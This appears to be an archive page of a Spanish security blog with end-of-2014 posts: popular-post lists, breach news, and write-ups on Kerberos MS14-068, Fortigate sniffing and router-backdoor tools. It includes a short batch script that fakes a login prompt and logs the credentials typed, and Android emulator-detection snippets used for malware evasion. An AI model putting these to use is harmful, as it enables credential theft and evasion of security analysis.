Lo más visto del 2014 en Hackplayers

Volvemos a despedir el año con las 50 entradas de Hackplayers más vistas, según Google Analytics.

Como siempre, daros las gracias por leernos y participar con vuestros comentarios, soluciones a los retos y colaboraciones. No dudéis en contactar con nosotros si estáis interesados en algún tema en particular o si queréis participar con vuestro artículo. Nos vemos en el 2015. ¡Feliz y próspero año nuevo!

  1. 8 servicios proxy gratuitos para evitar restricciones y mantener el anonimato y la privacidad
  2. Aplicación Android para robar y leer chats de WhatsApp en Android (PoC)
  3. 25 servicios VPN gratuitos for fun and profit
  4. androrat: un troyano RAT para Android
  5. El abc para desproteger un Excel con contraseña
  6. WiFite: crackear redes wifi para dummies
  7. Cómo comprometer el patrón de desbloqueo de Android
  8. Echando un vistazo a un cajero automático manipulado
  9. Cómo usar Whatsapp desde tu PC con Pidgin y el plugin 'whatsapp-purple'
  10. Descarga gratis los 100 mejores libros de hacking de Raj Chandel
  11. Algunos google dorks para espiar cámaras web en Internet
  12. Haciendo trampas en TriviaDos
  13. Espiando a Julia a través de su webcam
  14. De cómo colarse en el metro de forma elegante... (NFC hack)
  15. Cortes y lentitud en Internet a nivel global porque muchos routers no soportan más de 512k rutas BGP (o "la que se avecina")
  16. Lista de las principales certificaciones de seguridad informática y hacking ético
  17. Cómo saltar los enlaces de publicidad como adf.ly o similares
  18. Cómo crear un certificado SSL auto-firmado
  19. Crackea redes wifi con tu Android (en modo monitor)
  20. Blogroll en español
  21. Cómo usar Google como servidor proxy
  22. Evadir un portal cautivo mediante un túnel DNS
  23. Instalar Android en iPhone
  24. Recuperan miles de fotos y datos personales de smartphones de segunda mano que habían sido reseteados de fábrica
  25. Construye tu propio rover teledirigido con Raspberry Pi y WebIOPi
  26. 5 alternativas a Google para que no te sigan la pista en Internet
  27. Cómo clonar la tarjeta SD de la Raspberry Pi
  28. Introducción a Social-Engineering Toolkit (SET)
  29. hackplayers: Retos de Hackplayers
  30. Recuperar fácilmente ficheros borrados en Linux
  31. Cuidado con la extensión de Chrome de Series.ly...
  32. 50 tutoriales para el administrador de sistemas de Unix/Linux
  33. WhatsAppSniffer: captura fácilmente conversaciones de WhatsApp
  34. Instalar Arch Linux y Kali Linux en Raspberry Pi (arranque dual con BerryBoot)
  35. Libro: Hacker Épico en pdf
  36. El viejo truco de las sticky keys sigue funcionado
  37. PoCs para explotar masivamente la vulnerabilidad Heartbleed (OpenSSL CVE-2014-0160)
  38. Vulnerabilidad en Skype permite obtener la IP de cualquier usuario
  39. Recopilación de herramientas Python para pentesters
  40. Cómo crear una conexión cliente-servidor TCP o UDP con Python
  41. ¡Borré mis chats de WhatsApp sin querer! ¿Los puedo recuperar?
  42. Comprometiendo sistemas Android (1ª parte)
  43. Taller de lock picking #2: Técnicas de apertura
  44. Bugtraq vs Kali Linux
  45. Cicada 3301: quizás el puzzle más misterioso y elaborado de Internet
  46. Puerta trasera oculta en Windows
  47. Qué deberíamos saber sobre Tcpdump (parte I)
  48. ¿Tienes un televisor LG? Pues seguramente te estén monitorizando...
  49. Nueva herramienta para descifrar BitLocker, PGP y TrueCrypt (Elcomsoft Forensic Disk Decryptor)
  50. La Web Oculta: Alguna vez pensaste por qué navegamos la web y no… nos sumergimos en ella?

Los 10 supercomputadores más potentes del mundo en 2014

Las listas "top" siempre son típicas en los últimos días de año y una que siempre me ha encantado ha sido la de las supercomputadoras más poderosas del mundo. Aunque más que supercomputadora podríamos hablar de 'ambientes de cómputo de alto desempeño' ya que son un conjunto de poderosos ordenadores unidos entre sí para aumentar su potencia de trabajo y desempeño y que hoy en día capaces de operar en petaFLOPS, es decir, son capaces de procesar 1015  operaciones de coma flotante por segundo!!
Gracias al proyecto TOP500, desde 1993 y cada seis meses se publica un ranking que a noviembre de 2014 es el siguiente:

1. Tianhe-2

Tianhe-2 o Milky Way-2 (en chino: 天河二号) es una supercomputadora desarrollada por la Universidad Nacional de Tecnología de Defensa de China (NUDT) y la empresa china Inspur, está ubicada en el Centro Nacional de Supercomputación en Guangzho (NSCC-GZ), República Popular China. Tiene un rendimiento de 33,86 petaFLOPS (33.860.000.000.000.000 operaciones de coma flotante por segundo), con un pico teórico de 54,9 petaFLOPS que la convierte en la supercomputadora más rápida del mundo.
Está equipada con 16.000 nodos, cada uno con dos procesadores Intel Xeon IvyBridge E5-2692 (12 núcleos, 2,2 GHz) y tres procesadores Intel Xeon Phi 31S1P (57 núcleos, 1,1 GHz), cuya combinación da un total de 3.120.000 núcleos de computación. Es capaz de almacenar 12,4 PB, tiene una memoria del sistema de 1.375 TiB (1,34 PiB) y utiliza el sistema operativo Kylin Linux. Se calcula que ha costado entre 200 y 300 millones de dólares.
 

Un huevo de pascua oculto en Metasploit desde 2011

Wei Chen alias sinn3r, miembro de Corelan Security & Exploit-DB y desarrollador de exploits para Metasploit, ha hecho público un huevo de pascua que nadie ha descubierto desde que lo introdujo en 2011. Concretamente, en el exploit CVE-2010-3275 que permite la ejecución arbitraria de código debido a un fallo en VideoLAN VLC Media Player (anterior a 1.1.8) al manejar archivos AMV
 
Como en ese momento sinn3r no encontraba ningún video en ese formato, sacó su cámara y grabó un breve vídeo para luego convertirlo a AMV. Ese vídeo (msf/data/exploits/CVE-2010-3275.amv) puede escucharse pero no visualizarse al estar corrupto, aunque para ver el mensaje que oculta sólo hay que realizar una sencilla modificación con un editor hexadecimal.

En el byte 0x40th, verás el DWORD 0xA0 0xA0 0x00 0x00. Esto es en realidad el ancho de la resolución del vídeo, cuya manipulación provoca la vulnerabilidad. Cambia el segundo 0xA0 a 0x00, lo que se traduce a 160 en decimal, como en la siguiente imagen:



Ahora descarga la última versión de VLC Player (que ya no es vulnerable) y podrás ver el mensaje oculto durante años:



¡Feliz navidad!

clear-host
write-host
$Rows = 30
$colors = "DarkRed","Cyan","Red","Magenta","Yellow","White","cyan"           
    $oldpos = $host.ui.RawUI.CursorPosition
    Foreach ($r in ($rows..1)){
        write-host $(" " * $r) -NoNewline
        1..((($rows -$r) * 2)+1) | %{
           
                write-Host "*" -ForegroundColor Darkgreen  -nonewline
           
       }
        write-host ""
    }           
    write-host $("{0}***" -f (' ' * ($Rows -1) ))  -ForegroundColor DarkGreen
    write-host $("{0}***" -f (' ' * ($Rows -1) ))  -ForegroundColor DarkGreen
    $host.ui.RawUI.CursorPosition = $oldpos
    sleep .05
$numberstars=[math]::pow($Rows,2)
$numberlights=$numberstars *.25
for ($i = 0; $i -lt $numberlights; $i++)
{
$Starlocation+=@($host.ui.Rawui.CursorPosition)
}
$oldpos = $host.ui.RawUI.CursorPosition
while($true)
{
foreach ($light in ($numberlights..1))
    {
    $row=(get-random -min 1 -max (($Rows)+1))
    $column=($Rows-$row)+(get-random -min 1 -max ($row*2))
    $temppos=$host.ui.rawui.CursorPosition
    $temppos.x=$column
    $temppos.y=$row
    $Starlocation[(($light)-1)]=$temppos
    $host.ui.RawUi.CursorPosition=$temppoS
        write-Host "*" -ForegroundColor  ($colors | get-random) -nonewline
    }
        write-host ""
    Sleep .5
foreach ($light in ($numberlights..1))
    {
    $host.ui.RawUI.CursorPosition=$Starlocation[(($light)-1)]
    write-Host "*" -ForegroundColor DarkGreen -nonewline
    }
} 

The Pirate Bay reaparece con una clave BitTorrent Sync #tpbbtsync

Como sabéis, el pasado 9 de diciembre ThePirateBay.se fue cerrado, pero después de un tiempo offline ha vuelto a aparecer misteriosamente registrado en Chisinau (Moldavia), con una bandera pirata de fondo, un contador que muestra el tiempo que lleva el servicio caído y, sobretodo, una imagen 'aes.png' con el texto: 

‘JyO7wNzc8xht47QKWohfDVj6Sc2qH+X5tBCT+uetocIJcjQnp/2f1ViEBR+ty0Cz‘.


Lista de ciberataques y brechas de seguridad de 2014

Lewis Morgan nos regala una buena lista de ciberataques y brechas, mes a mes durante 2014:

Enero
1 Enero, 2014 – 1.1 MILLION customers’ credit card data was swiped in Neiman Marcus breach
20 Enero, 2014 – Credit Card Details of 20 Million South Koreans Stolen
21 Enero, 2014 – Microsoft blog hacked by Syrian Electronic Army
24 Enero, 2014 – CNN website, Twitter and Facebook hijacked by Syrian Electronic Army
25 Enero, 2014 – Michaels Stores confirms payment card information compromised in breach
Febrero
5 Febrero, 2014 – Texas health system attacked, data on more than 400K compromised
14 Febrero, 2014 – Forbes.com Hacked by Syrian Electronic Army Because of “Hate for Syria”
16 Febrero, 2014 – Kickstarter hacked: Passwords, phone numbers, and phone numbers stolen
24 Febrero, 2014 – YouTube ads spread banking malware
25 Febrero, 2014 – Mt. Gox exchange goes dark as allegations of $350 million hack swirl
Marzo
10 Marzo, 2014 – Hackers steal 12 million customer records from South Korean phone giant
14 Marzo, 2014 – Credit Card Breach at California DMV
17 Marzo, 2014 – Morrisons employee arrested following data breach involving details of 100k staff
20 Marzo, 2014 – EA Games website hacked to phish Apple IDs from users
28 Marzo, 2014 – Malware in 34 Spec’s stores, payment data compromised for 550K

Esta navidad vuelve el Grinch... para escalar privilegios en tu Linux

Llega la navidad y con ella vuelve el Grinch, esta vez como una vulnerabilidad en el nuevo sistema de autenticación de Linux que permite el escalado de privilegios a través de wheel

Ya sabéis que Wheel es un usuario especial que controla el acceso al comando su. Cuando instalamos un sistema Linux, el usuario por defecto es asignado al grupo Wheel para poder realizar tareas administrativas.

Los Linux modernos implementan nuevos métodos de autenticación y autorización para evitar una gran variedad de vectores de ataque introducidos con binarios setuid aleatorios. Polkit (Policy Kit), una API de autorización para los programas privilegiados, es uno de los principales impulsores para dejar de usar los binarios setuid.

Por otro lado, PackageKit es un conjunto de herramientas que permite una capa de abstracción (sobre D-BUS) para trabajar a través de sistemas de gestión de paquetes y arquitecturas. Es decir, intenta facilitar el uso de gestores como APT, Yum, pacman y otros. ¿Adivináis que backend utiliza para la autenticación de usuarios? Sí, utiliza Polkit.

BlueMaho: suite para testing de dispositivos bluetooth

BlueMaho es una vieja tool con un GUI-shell (interface) para manejar un conjunto de herramientas utilizadas en pruebas de seguridad de Bluetooth. Es gratuita, de código abierto y está escrita en python (utiliza wxPython). Puede ser utilizada para búsqueda de vulnerabilidades conocidas en dispositivos Bluetooth y, sobretodo lo más importante, encontrar vulns desconocidas. También puede obtener lindas estadísticas.

Ya no está actualizada, pero tiene muchas características que te dan un punto de partida ideal para empezar a jugar:

- búsqueda de dispositivos, mostrar información avanzada, registros SDP, proveedor, etc.
- tracking de dispositivos - mostrar dónde y cuantas veces se ven los dispositivos, y sus cambios de nombre
- Loop scan - puede escanear todo el tiempo, mostrando dispositivos en línea
- Alertas con sonido si se encuentra un nuevo dispositivo
- on_new_device - se puede especificar qué comando debe ejecutarse cuando se encuentra un nuevo dispositivo
- Se puede utilizar dongles separados - uno para scaning (loop scan) y otro para ejecutar otras herramientas o exploits
- envío de archivos
- Cambio de nombre, clase, modalidad, BD_ADDR de dispositivos locales HCI
- Guarda los resultados en base de datos
- Crea completas estadísticas (dispositivos únicos por día/hora, proveedores, servicios, etc.)
- tests de dispositivo remotos en busca de vulnerabilidades conocidas (ver exploits para más detalles)
- tests de dispositivo remotos para vulnerabilidades desconocidas (ver herramientas para más detalles)
- se pueden personalizar temas

Más info: https://wiki.thc.org/BlueMaho

Cómo detectar si nuestra aplicación en Android se está ejecutando en un emulador

La mayoría del malware moderno trata de escapar de ser analizado y uno de las primeras cosas que hace es comprobar si se está ejecutando en un entorno controlado. En el mundo del malware para Android el ambiente controlado se refiere a un emulador. Si el malware se ejecuta en un emulador, eso significa que lo más probable es que esté siendo analizado por un investigador. Hay varios métodos que los desarrolladores de malware utilizan para detectar el entorno emulado.

1.) Comprobar el Nombre del producto:


En el emulador de Android, el nombre de producto del dispositivo contiene la cadena "sdk" por lo que es un indicio útil para detectar si la aplicación se está ejecutando en un emulador. Con el fin de comprobar el nombre del producto, puedes utilizar el siguiente fragmento de código:

if (Build.PRODUCT.contains ("sdk"))
    #do something

2.) Comprobar el Nombre del modelo:
 
El nombre del producto por defecto del emulador de Android contiene la cadena "sdk". Por lo tanto, vale la pena comprobar también el nombre del modelo con el fin de detectar el uso emulador.
if (Build.MODEL.contains ("sdk"))
    #do something

3.) Comprobar el Nombre del operador de la SIM:

 
En los emuladores de Android, el nombre del operador SIM viene con el valor por defecto "Android". Esto no ocurre en los dispositivos físicos normales aún cuando no hay una tarjeta SIM instalada en el dispositivo.
TelephonyManager localTelephonyManager = (TelephonyManager)getApplicationContext().getSystemService("phone"):
if (localTelephonyManager.getSimOperatorName().equeals ("Android"))
    #do something

RPEF: la herramienta para backdoorizar routers domésticos

Seguro que todavía resuenan en vuestros oídos noticias sobre la presencia de backdoors en muchos modelos de routers. D-Link, Netis, Netgear, Linksys, Belkin, TRENDnet, MediaLink, Sercomm ... la lista es muy larga. 

Si tu también quieres hacerte el "chino" y vender en eBay tu viejo router con un regalo sorpresa añadido (es broma, no seais malos), puedes usar RPEF...

En la Defcon 20, Michael Coppola presentó una herramienta en Python llamada RPEF (Router Post-Exploitation Framework) con la que automatiza el proceso para añadir un backdoor en un buen número de firmwares para distintos modelos de routers SOHO:

- Belkin: F5D7230-4_v1xxx
- D-Link: DIR-601_1.01NA y DIR-601_2.01NA
- Linksys: WRT120N_1.0.07_(Build_02)
- NETGEAR: WGR614v10_1.0.2.26NA, WGR614v9_1.2.30NA, WNDR3700v1_1.0.16.98NA, WNDR3700v2_1.0.0.12 y WNR1000v3_1.0.2.26NA
- TRENDnet: TEW-651BR_v2.2R_2.00B12 y  TEW-652BRP_v3.2R_3.00B13

La sintaxis básica del script (python 2.6) es: 


./rpef.py <firmware image> <output file> <payload>
 
Una vez que el firmware malicioso está actualizado/instalado y funcionando en el router, el atacante tendrá a su disposición un sniffer de red desde la línea de comandos o un bot que se puede conectar a un canal IRC especificado para lanzar una herramienta DDoS... interesante ¿verdad?

Página del proyecto: https://github.com/mncoppola/rpef

Programa del XI Ciclo de Conferencias UPM TASSI gratuitas

Del 12 de febrero al 9 de abril de 2015, cada semana y todos los jueves no festivos de 11:00 a 13:00 horas, se celebrará en el campus sur de la Universidad Politécnica de Madrid, España, el XI Ciclo de Conferencias UPM TASSI 2015, con la participación de los siguientes ponentes en las siguientes siete conferencias:
  • Conferencia 1: 12 de febrero de 2015: "Seguridad en redes móviles GSM, GPRS, 3G, 4G", José Picó y David Pérez (Layakk)
  • Conferencia 2: 19 de febrero de 2015: "ULTRA: Enigma y Fish", Román Ceano (Vector3)
  • Conferencia 3: 26 de febrero de 2015: "Memorias de un perito informático forense", Lorenzo Martínez (Securízame)
  • Conferencia 4: 5 de marzo de 2015: "Hispasec: 16 años de seguridad informática", Antonio Ropero (Hispasec)
  • Conferencia 5: 12 de marzo de 2015: "Ecrime evolution", Marc Rivero (CyberSOC Deloitte) y Dani Creus (Kaspersky Lab)
  • Conferencia 6: 26 de marzo de 2015: "Offensive forensics", Pedro Sánchez(Conexión Inversa)
  • Conferencia 7: 9 de abril de 2015: "Protección de las comunicaciones críticas por fibra óptica", José María Marín (FiberNet)
  • Conferencia 8: 16 de abril de 2015: "Malware en Android y Google Play",
    Sergio de los Santos (ElevenPaths)
Puede descargar el tríptico con el Programa del XI Ciclo de Conferencias
UPM TASSI 2015 desde esta dirección:
http://www.criptored.upm.es/descarga/TripticoTASSI2015.pdf

Se recuerda que la asistencia es libre y se entregarán 2 créditos de Continuing Professional Education CPE por conferencia a quien asista, firme su asistencia y lo solicite en la misma conferencia por escrito.

Las conferencias serán grabadas por el Gabinete de Tele-Educación GATE de la UPM, para subirlas posteriormente al canal YouTube de esta universidad.

Puede acceder a los vídeos de las anteriores ediciones desde la sección
multimedia de Criptored:
http://www.criptored.upm.es/multimedia/index.php

Más información en el sitio web de TASSI:
http://www.lpsi.eui.upm.es/GANLESI/GANLESI.htm

USBPcap: sniffer USB para Windows

USBPcap es un sniffer USB de código abierto para Windows (XP, Vista, 7 y 8). Es capaz de capturar toda la actividad de cualquier dispositivo USB en formato pcap para un posterior análisis con Wireshark (1.10.0rc1 o superior).
 

Su funcionamiento es muy sencillo. Una vez descargado (USBPcapSetup-1.0.0.7.exe) e instalado nos iremos a su directorio y ejecutaremos USBPcapCMD.exe para ver los Root Hubs. Después seleccionaremos el dispositivo que queremos monitorizar y el fichero donde se volcará la captura:


Con Control+C pararemos cuando queremos la captura y podremos analizar el fichero pcap con Wireshark. Como podéis comprobar en la siguiente imagen podemos registrar toda la actividad del USB, incluido la escritura en ficheros:



También podemos ver la captura en tiempo real con el siguiente comando:

USBPcapCMD.exe -d \\.\USBPcap1 -o - | "d:\Program Files2\Wireshark\Wireshark.exe" -k -i -

 

Web del proyecto: http://desowin.org/usbpcap/index.html
Página Github del proyecto: https://github.com/desowin/usbpcap

PuttyRider: pivotando mediante el Putty de un sysadmin hacia un servidor que se "resiste"

Una herramienta que presentaron en la Defcamp 2014 y que me llamó mucho la atención es PuttyRider de Adrian Furtunã de KPMG Rumanía. Con esta herramienta es posible aprovechar la máquina de un sysadmin que está conectado mediante Putty a un servidor Linux (SSH, Telnet, Rlogin), pudiendo pivotar desde su máquina hacia dicho servidor, algo ideal en un pentest donde no hemos descubierto ninguna vulnerabilidad importante para comprometerlo.


Como veis, lo que hace es "montar" la sesión Putty pudiendo esnifar el tráfico (incluido contraseñas) e inyectar comandos con los privilegios del usuario. Se basa en PuttyHijack e utiliza también inyección de DLLs y function hooking para secuestrar el proceso de Putty, pero además funciona con todas las versiones, con los últimos SO (Windows 8, Windows 7, etc) y no requiere privilegios de administración.

CVE-2014-6324 o cómo validarse con cualquier usuario como administrador de dominio

El 18 de noviembre Microsoft anunció en el boletín MS14-068 una vulnerabilidad crítica en Kerberos que permite elevación de privilegios.
A grandes rasgos es un fallo en el Servicio de Kerberos del Controlador de Dominio (KDC) que permite a cualquier usuario del dominio validarse contras los DCs como administradores de dominio (o cualquier otro grupo que especifiquemos).

Validación Kerberos

Para para saber en qué consiste la vulnerabilidad primero debemos entender un poco cómo funciona Kerberos. En resumen el proceso de validación de un usuario es el siguiente:

1.- Cuando un usuario se valida se genera un ticket TGT (Kerberos service ticket) con una petición AS-REQ que contiene un timestamp cifrado y el hash de la contraseña.
2.- El Servicio de Kerberos del Controlador de Dominio o KDC recibe la petición, valida los datos y responde con un AS-REP. El TGT ahora contiene un PAC con todos los grupos a los que pertenece el usuario.
3.- Cuando el usuario quiere acceder a un recurso del Directorio, el TGT generado se presenta al KDC junto con ese recurso específico (Service Principal Name). 
4.- El Controlador de Dominio determina si el TGT es válido y, si lo es, genera un TGS (Resource Access Ticket) cifrado/firmado con una parte de la clave de sesión (hash NTLM de la contraseña del usuario o clave privada de un certificado válido) y con la cuenta KRBTGT, una cuenta especial que reside en todos los DCs que nunca no debe ser borrada ni renombrada.
5.- El TGS luego se envía al KDC para validar la sesión (comprueba si puede descifrarlo con la clave de sesión) y los grupos del PAC para determinar los derechos de acceso del usuario. 


Por defecto el TGT es válido 10 horas y puede ser renovado automáticamente por 7 días. Este ticket no permite el acceso directo a un servicio en particular, sino que "representa" la identidad del usuario actual que ha sido validado por el KDC. El propio TGT está cifrado por el KDC vía el hash de la cuenta krbtgt. El cliente no puede descifrarlo, lo usa "tal cual".

Capturando credenciales en claro mediante un firewall Fortigate

En este mundillo estamos cansados de repetir que se sustituya FTP y telnet por sus respectivos equivalente seguros: SCP, FTPS, SFTP, SSH... pero después de tantos años se siguen utilizando :(

Hoy vamos a hacer una pequeña demostración de la inseguridad del uso de estos protocolos no cifrados capturando tráfico mediante un firewall y obteniendo las contraseñas en claro. 

En la vida real el firewall podría ser la máquina de un atacante, el cuál tendría la misma facilidad para robar credenciales simplemente esnifando el tráfico en un nodo que está en medio del camino de nuestra conexión cliente-servidor. Y no sólo el atacante podría ser una persona hábil que ha envenenado ARP y ha conseguido hacer un MiTM... en este gran entramado que es Internet, un ISP o hasta el administrador de red de una empresa podría estar vigilando...

Para nuestro escenario concreto el firewall será un Fortigate. Estos cacharros tienen una gran variedad de comandos de diagnóstico. Permiten depurar aplicaciones comunes (ike, sslvpn, urlfilter...), el proceso de flujo de paquetes e incluso activar un sniffer bastante decente que arroja una salida muy similar a la de tcpdump (será un fork?). La sintaxis del comando es la siguiente:


# diag sniffer packet <interfaz> <'filtro'> <verbose> <contador> a

Veamos primero un ejemplo sencillo:
# diag sniffer packet internal 'src host 192.168.0.130 and dst host 192.168.0.1' 1

192.168.0.130.3426 -> 192.168.0.1.80: syn 1325244087
192.168.0.1.80 -> 192.168.0.130.3426: syn 3483111189 ack 1325244088
192.168.0.130.3426 -> 192.168.0.1.80: ack 3483111190
192.168.0.130.3426 -> 192.168.0.1.80: psh 1325244088 ack 3483111190
192.168.0.1.80 -> 192.168.0.130.3426: ack 1325244686
192.168.0.130.1035 -> 192.168.0.1.53: udp 26
192.168.0.130.1035 -> 192.168.0.1.53: udp 42
192.168.0.130.1035 -> 192.168.0.1.53: udp 42
192.168.0.130 -> 192.168.0.1: icmp: echo request
192.168.0.130.3426 -> 192.168.0.1.80: psh 1325244686 ack 3483111190
192.168.0.1.80 -> 192.168.0.130.3426: ack 1325244735
192.168.0.130 -> 192.168.0.1: icmp: echo request

Super-cutre script para capturar credenciales en batch

Algo cutre pero muy apañao... y seguro que más de uno se dará un gustazo con el batch... Xd
 

Se trata de un script para hacerse un keylogger *muy* básico. Simplemente crea el directorio c:\Logs y luego lanza el fichero Logger.bat con el siguiente código:
@echo off
color a
title Login
cls
echo Introduce usuario y password para poder ejecutar el programa:
echo.
echo.
cd "C:\Logs"
set /p user=Username:
set /p pass=Password:
echo Username="%user%" Password="%pass%" >> Log.txt
start calc.exe
exit
Enjoy!

Fuente: http://www.latesthackingnews.com/2014/04/09/how-to-create-a-keylogger-in-notepad/

El "texto de la muerte" para los usuarios de WhatsApp en Android

Si hace tiempo hablamos del descubrimiento de un "texto de la muerte" en Apple hoy hablamos de algo similar para WhatsApp...

Dos investigadores indios de tan sólo 17 años han reportado que existe una vulnerabilidad en WhatsApp que permite que la aplicación se detenga por completo al intentar leer un sólo mensaje de 2000 caracteres especiales y tan sólo 2 KB de tamaño.



La vulnerabilidad ha sido probada y funciona correctamente en la mayoría de las versiones de Android y de WhatsApp incluyendo la 2.11.431 y 2.11.432. Sin embargo todavía no se ha probado en iOS y Windows no parece ser vulnerable.

Esto podría provocar que se extienda como una pesada broma la moda de bloquear WhatsApp a otras personas, cuyo modo de recuperar el uso de la misma sería borrando la conversación y el historial de chat con quien estábamos conversando. Imaginad que ocurre si este mensaje se envía a un grupo...


Fuente: Crash Your Friends' WhatsApp Remotely with Just a Message

Filtran películas sin estrenar en el último ataque a Sony... y lo que está por venir

La semana pasada en Reddit se comentaba que en cada PC de Sony Pictures apareció una pantalla con un mensaje de GOP “Guardians of Peace” avisando de que habían accedido y robado información confidencial (“hasta 100 terabytes”). 

Poco después empezaron a circular en redes P2P una lista de títulos que incluye 'Corazones de acero' ('Fury', David Ayer, 2014), el remake de 'Annie' (Will Gluck, 2014), 'Mr. Turner' (Mike Leigh, 2014), 'Siempre Alice' ('Still Alice', Richard Glatzer & Wash Westmoreland, 2014) y 'To Write Love On Her Arms' (Nathan Frankowski, 2015).

'Corazones de acero' sólo se ha estrenado recientemente en Estados Unidos y el resto todavía ni siquiera han visto la luz en taquilla, una taquilla que previsiblemente reducirá sus ganancias después de las filtraciones.

Sony sospecha que este ataque es una venganza por 'The Interview' (en la imagen), comedia donde Seth Rogen y James Franco se proponen atentar contra el líder de Corea del Norte...

Quizás sea una conclusión demasiado precipitada o quizás no, aunque seguro que pronto lo sabremos puesto que Sony a raíz de esta intrusión ha contratado los servicios forenses de FireEye's Mandiant que, junto con el FBI, estudiará el caso.

¿Veremos nuevos leaks de, por ejemplo, avances de nuevas películas? ¿otra información sensible?


Fuentes:
- Sony pirateada: varios estrenos subidos a Internet
- Unreleased Sony movies leak online following studio hack
- Unreleased Sony movies leaked to file-sharing sites after hack
- ¿Está Corea del Norte detrás del ataque hacker a Sony Pictures?
- Sony Pictures Investigates North Korea Link In Hack Attack 

- Opinion: Premature Attribution of Sony Breach to North Korea Irresponsible
- Sony hires FireEye's Mandiant following internal security breach

Llega el hardware diseñado para manipular y tomar el control de cualquier coche inteligente

Los coches modernos están entrando de lleno en la era de la Internet de las Cosas (IoT).
¿Quieres desbloquear el coche con su smartphone a través de Internet o cambiar los comandos de los botones del volante? Necesitas un poco de hardware como Carduino para hablar con el coche...




Carduino es un dispositivo de código abierto desarrollado por el fundador de CarKnow, Josh Siegel, en los laboratorios del MIT. El proyecto nació como una simple idea para permitir a los desarrolladores crear aplicaciones que funcionan con comandos CAN (Controller Area Network). El resultado es un dispositivo que permite al propietario trabajar y cambiar las características del coche.

Hackerstrip, ¡un webcomic sobre historias reales de hackers reales!

Portada Vol. 1 previsto para agosto de 2015
Cuando Mikko Hypponen muestra abiertamente el apoyo a una campaña de crowdfunding sin duda merece la pena dejar un momento lo que estás haciendo y echar un vistazo... y no decepciona... se trata de Hacker Strip, ¡un webcomic sobre historias reales de hackers reales!

Un cómic que ofrece un vistazo al mundo de la seguridad en Internet como nunca lo habías visto antes. Las técnicas ilustradas implican algunos de los recientes incidentes más actuales en el sector de la seguridad y son muy similares a los escenarios del mundo real que representan. El primer volumen está casi hecho y en sus páginas encontraréis referencias a Heartbleed, el anonimato en Tor, la Web profunda y SilkR0ad, y muchas más sorpresas.


Necesitan apoyo para recaudar $10,000 y terminar de hacerlo posible. Los fondos serán utilizados para producir más episodios y para imprimir los ejemplares impresos del libro.

Campaña: https://www.indiegogo.com/projects/hackerstrip-real-stories-real-hackers

Distribuyen malware por medio de cigarrillos electrónicos

Sí, habéis oído bien, al parecer los cigarrillos electrónicos se han convertido en el último vector de propagación de software malicioso.

A pesar de que la idea podría parecer hilarante, muchos cigarrillos electrónicos se pueden cargar a través de USB, mediante un cable especial o mediante la inserción de un extremo del cigarrillo directamente a un puerto USB.

Una entrada publicada en Reddit informó de un extraño caso que ocurrió a un ejecutivo en el que se descubrió un malware en su sistema sin identificar de inmediato su origen.

"Un ejecutivo tenía una infección de malware en su ordenador desde el que no se pudo determinar el origen", dijo el usuario de Reddit "Después de que se comprobaran todos los medios tradicionales de infección, se comenzó a buscar otras posibilidades".
   
En la investigación sobre el caso se descubrió que el ejecutivo había dejado de fumar hace dos semanas y que se pasó a unos cigarrillos electrónicos hechos en China que compró en eBay a un precio unitario de tan sólo 5 dólares. Tras analizarlos pudieron determinar que venían con un malware hardcoded en el cargador y, una vez que la víctima lo conecta al ordenador, el código malicioso se comunica con el servidor C&C y descarga otro software malicioso para infectar el sistema.

"El e-cigarrillo hecho en China tiene malware hardcoded en el cargador, y cuando se conecta al puerto USB de una computadora el malware llama a casa e infecta el sistema."

De momento no hay demasiados detalles pero se considera que el caso podría ser un ataque plausible.

Fuente: Electronic cigarettes exploited in the wild to serve malware

PoC permite la ejecución remota de código en todas las versiones de IE (no parcheadas): CVE-2014-6332

Si sois de este mundillo seguro que tenéis presente que hace muy poco Micro$oft publicó un parche de seguridad para solucionar una vulnerabilidad presente en Internet Explorer 3.0, es decir hace 19 años, y que se ha ido heredando por todas las versiones posteriores de este navegador hasta que el 11 de noviembre de 2014 se publicó el boletín MS14-064 que la solucionaba.

Catalogada como CVE-2014-6332 tiene una puntuación de 9,3 sobre 10 en el CVSS (Common Vulnerability Scoring System), permite la ejecución de código remoto sin autorización del usuario y es incluso capaz de evadir el sandbox EPM (Enhanced Protected Mode) en IE11 y las protecciones de EMET.

El bug es causado por el incorrecto manejo del motor de VBScript del navegador al redimensionar arrays. VBScript.dll contiene un método de evaluación en tiempo de ejecución que mediante OleAut32.dll llama a la función SafeArrayRedim() para cambiar el tamaño del array. Sin embargo, si se produce un error, el tamaño no se resetea antes de regresar a la función de llamada, VBScript!CScriptRuntime::Run():



En VBScript, la explotación de este bug podría haberse evitado quitando el "On Error Resume Next" del código cuando la biblioteca OLEAUT32 devuelve un error. Como no es así es posible provocar un desbordamiento.

Además, ésto puede explotarse fácilmente gracias al denominado "Godmode", un flag que permite al navegador ejecutar VBScript sin restricciones como si fuera un shell local por lo que no es necesario preparar un payload y protecciones como DEP, ASLR y CFI no son aplicables.

Pues bien, recientemente el investigador chino Yuange1975 (adivinar cuantos añitos tiene Xd) ha publicado una PoC que permite escribir fácilmente código VBScript para comprometer equipos no parcheados. A continuación véase el código para probarlo, si bien un buen antivirus/malware debería detectarlo:

Lecciones de “malwareterapia”: disparen contra ese fantasma - parte 2

Viene de Lecciones de “malwareterapia”: disparen contra ese fantasma - parte 1 .

¿Cuáles son los requisitos básicos para ser un hacker? A lo mejor estoy aquí... hable y hable y resulta que ni los cumplo, ¿no?. Si yo estuviera en tu lugar me aseguraría primero de que el pendejo que tienes enfrente se atreviera a comprobar todo lo que está escupiéndote desde hace 2 horas. ¿O qué opinas? Sea como fuere, voy a quedarme sin saber tu opinión, si no ¿con qué confianza te puedo seguir contando mis medias verdades? La gente se pasa la vida contándose mentiras para que pasen por verdades cuando es mucho más divertido hacer lo contrario. La verdad ataviada de mentiras para que te la atragantes con ganas.  Aunque déjame decirte que una buena mentira puede hacer realidad los sueños más estrafalarios. Una buena mentira te podría meter en la cama de la mujer más buenota del mundo. Tú mismo nunca vas a imaginarte qué clase de mentiras de mierda te trajeron al mundo.

No está bien que lo diga, pero creo que el problema entre el mundo y yo no está en que él es muy normal y yo muy… muy hacker. Digo, cuál hacker no mames. La bronca que te quiero hacer notar es que el sacerdote y la puta no se llevan. Yo no soy una puta… aclaro, pero si soy un mustio ogt. Y también piruja wannabe. Y chilango wannabe. Y un blackhat wannabe. Con todas esas medallitas ya colgando de mí, ¿no sabrías diferenciar inmediatamente a un tipo medianamente decente y normal, aunque fuera un decente wannabe, de tu servidor?
